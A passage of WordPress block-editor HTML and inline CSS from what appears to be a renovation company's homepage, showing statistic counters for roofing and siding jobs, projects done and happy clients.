.block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-98ff327e-941a-4894-bff7-2d76ffc2b5d9\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"f369bfc5-c626-4c6c-93f0-eef984046450\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"f14f54ba-714b-48b2-a325-d252606e8a97\"} -->\n<style type=\"text/css\"> .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f14f54ba-714b-48b2-a325-d252606e8a97\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"15454e94-baea-43b6-bd47-7e960bc3f840\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">341+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"6b12791c-0422-4fd5-afdb-743de813f280\"} -->\n<style type=\"text/css\"> .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6b12791c-0422-4fd5-afdb-743de813f280\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"1dc4517d-60d4-498d-b5f8-05c6b761c25e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"6a895e67-fb7e-485b-ad64-1dca51a18e5b\"} -->\n<style type=\"text/css\"> .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a895e67-fb7e-485b-ad64-1dca51a18e5b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"27d4a194-b2dc-4dbb-a8f5-390309e75841\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 